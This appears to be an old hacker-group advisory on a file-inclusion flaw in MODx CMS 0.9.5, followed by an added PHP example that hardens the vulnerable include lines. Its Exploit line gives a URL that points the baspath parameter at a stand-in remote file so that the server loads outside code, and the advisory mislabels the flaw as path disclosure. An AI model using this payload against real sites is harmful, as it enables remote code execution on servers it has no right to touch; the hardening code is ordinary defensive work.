**********************************
*AuThor:Silitoad *
*emA!l:Silitoad[at]hotmail[dot]Com *
*HoMePaGe:http://www.silitoad.org *
**********************************
Powered By Silitoad From Arabian-Fighterz

[Info]
Website: http://modxcms.com/
Version: 0.9.5
Download: http://modxcms.com/assets/snippets/filedownload/download.php?path=YnVpbGRz&fileName=modx-0.9.5.zip
Problem: Full path disclosure, include file bug:

    include_once $baspath."/tmplvars.format.inc.php";
    include_once $baspath."/tmplvars.commands.inc.php";

[Vuls]
1. Full path disclosure:

[Exploit]
http://target//manager/includes/document.parser.class.inc.php?baspath=http://evilcode.txt ?

[Fix]
Vuls have been reported to the author, no reply yet.

[Greetings]
Greets to l1nuxm4, Sn1p8r, Sbitar, Op3runix, Diabolax, Master_lsd, Hypn0se, Dvorak-....
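
An added example, not MODx's own code and not a vendor fix: one way to harden the two include_once lines quoted under Problem. It assumes $baspath can be set from the request when the file is requested directly (as the exploit URL implies, e.g. with register_globals on) and that the tmplvars files sit beside this file; APP_ENTRY and safe_include() are hypothetical names.

```php
<?php
// Added illustration; APP_ENTRY and safe_include() are hypothetical names.
//
// Pattern quoted in the advisory (left as a comment, not executed):
//   include_once $baspath."/tmplvars.format.inc.php";
//   include_once $baspath."/tmplvars.commands.inc.php";
// The include directory comes from a variable this file never sets itself.
//
// Related php.ini settings: allow_url_include = Off, register_globals = Off,
// display_errors = Off (error text shown to clients can reveal full paths).

// 1. Refuse direct requests: only the application's entry script is assumed
//    to define this constant before pulling this file in.
if (!defined('APP_ENTRY')) {
    header('HTTP/1.0 403 Forbidden');
    exit('Direct access not permitted.');
}

// 2. Derive the include directory from this file's own location, never from
//    a variable that request data can influence.
$includeDir = realpath(dirname(__FILE__));

// 3. Include only allow-listed names and confirm that the resolved path
//    stays inside $includeDir. Failures go to the server log, not the client.
function safe_include($dir, $file)
{
    $allowed = array('tmplvars.format.inc.php', 'tmplvars.commands.inc.php');
    if (!in_array($file, $allowed, true)) {
        error_log('safe_include: name not on allow-list');
        return false;
    }
    $path = realpath($dir . DIRECTORY_SEPARATOR . $file);
    if ($path === false || strpos($path, $dir . DIRECTORY_SEPARATOR) !== 0) {
        error_log('safe_include: resolved path rejected');
        return false;
    }
    return include_once $path;
}

safe_include($includeDir, 'tmplvars.format.inc.php');
safe_include($includeDir, 'tmplvars.commands.inc.php');
```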